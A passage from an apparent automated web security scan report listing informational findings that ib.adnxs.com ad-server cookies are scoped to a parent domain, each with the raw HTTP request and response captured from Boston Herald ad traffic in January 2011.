EYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb810948=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:14:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:14:51 GMT
Content-Length: 742

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.86. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-46060337_1296254384%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D966058%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.8368365135975182%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb437727=5_[r^208WMuF4Lw)IE.8pxVr8?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP-1RhKNLepg-BWHfHSmrEEKtRENNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpggBAgUCAAIAAAAA6SF9GAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254125%29%3Buf%28%27r%27%2C+151403%2C+1296254125%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2811%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2882%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2884%2C+%274510489492096045549%27%2C+1296254125%2C+1306622125%2C+2132%2C+24319%29%3Bppv%2887%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28619%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28620%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3Bppv%28621%2C+%274510489492096045549%27%2C+1296254125%2C+1296340525%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb437727=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb266870=5_[r^208WMuF4Lw)IE.8qu]==?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPyqFBR3BpJpcBWHfHSmrEEKwRUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEsAQBAgUCAAIAAAAAHyH9zwAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296254384%29%3Buf%28%27r%27%2C+151403%2C+1296254384%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2811%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2882%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2884%2C+%276672826947225355562%27%2C+1296254384%2C+1306622384%2C+2132%2C+24319%29%3Bppv%2887%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28619%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28620%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3Bppv%28621%2C+%276672826947225355562%27%2C+1296254384%2C+1296340784%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:39:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:39:44 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-46060337_1296254384,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.87. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.quadbostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-256627_1296258325%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D357355%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_h%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb780011=5_[r^208WMt+t%s!@@-#bPpSh?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP_qJUyg65S1xBWHfHSmrEEKASkNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAApQQBAgUCAAUAAAAABSGv_AAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296255616%29%3Buf%28%27r%27%2C+151403%2C+1296255616%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2811%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2882%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2884%2C+%278155426538185263610%27%2C+1296255616%2C+1306623616%2C+2132%2C+24242%29%3Bppv%2887%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28619%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28620%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3Bppv%28621%2C+%278155426538185263610%27%2C+1296255616%2C+1296342016%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb780011=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb781784=5_[r^208WMt+t%s!@@-#?/ty]?enc=FuY9zjRhyT96tTdTfNfGPwAAAKCZmQlAerU3U3zXxj8V5j3ONGHJP-d6bImG40osBWHfHSmrEEIVVUNNAAAAANc8AwA3AQAAZAAAAAIAAABrTwIAsl4AAAEAAABVU0QAVVNEACwB-gCqAQAA3AUBAgUCAAUAAAAAVyHLDgAAAAA.&tt_code=cm.quadbostonherald&udj=uf%28%27a%27%2C+27%2C+1296258325%29%3Buf%28%27r%27%2C+151403%2C+1296258325%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2811%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2882%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2884%2C+%273191613452916128487%27%2C+1296258325%2C+1306626325%2C+2132%2C+24242%29%3Bppv%2887%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28619%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28620%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3Bppv%28621%2C+%273191613452916128487%27%2C+1296258325%2C+1296344725%2C+2132%2C+24242%29%3B&cnd=!_BsQQQjUEBDrngkYwI8BILK9ASgAMczraoU2Yck_QhMIABAAGAAgASj-__________8BQgwIUhDL3AYYAiADKABCDAhUEJa5DRgFIAMoAEgBUABYqgNgAGhk&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7*@DYS3+0s]#%2L_'x%SEV/i#-2N=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o@X$D@^v; path=/; expires=Thu, 28-Apr-2011 23:45:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 23:45:25 GMT
Content-Length: 824

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonherald/;net=cm;u=,cm-256627_1296258325,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de
...[SNIP]...

10.88. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-15223392_1296252139%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D463717%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.47846851754002273%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acb402178=5_[r^208WMuF4Lw)IE.8)Oje[?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPxfdyj3sNwc8BWHfHSmrEELYO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AYBAgUCAAIAAAAAwCFK9AAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251864%29%3Buf%28%27r%27%2C+151403%2C+1296251864%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2811%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2882%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2884%2C+%274325487454901165335%27%2C+1296251864%2C+1306619864%2C+2132%2C+24319%29%3Bppv%2887%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28619%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28620%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3Bppv%28621%2C+%274325487454901165335%27%2C+1296251864%2C+1296338264%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; 
acb217792=5_[r^208WMuF4Lw)IE.8._w.i?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8xSvlfRzDIuBWHfHSmrEELlO0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQElgQBAgUCAAIAAAAANCJDNAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296251877%29%3Buf%28%27r%27%2C+151403%2C+1296251877%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2811%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2882%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2884%2C+%273328948274072539852%27%2C+1296251877%2C+1306619877%2C+2132%2C+24319%29%3Bppv%2887%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28619%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28620%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3Bppv%28621%2C+%273328948274072539852%27%2C+1296251877%2C+1296338277%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; sess=1; icu=EAAYAA..; 
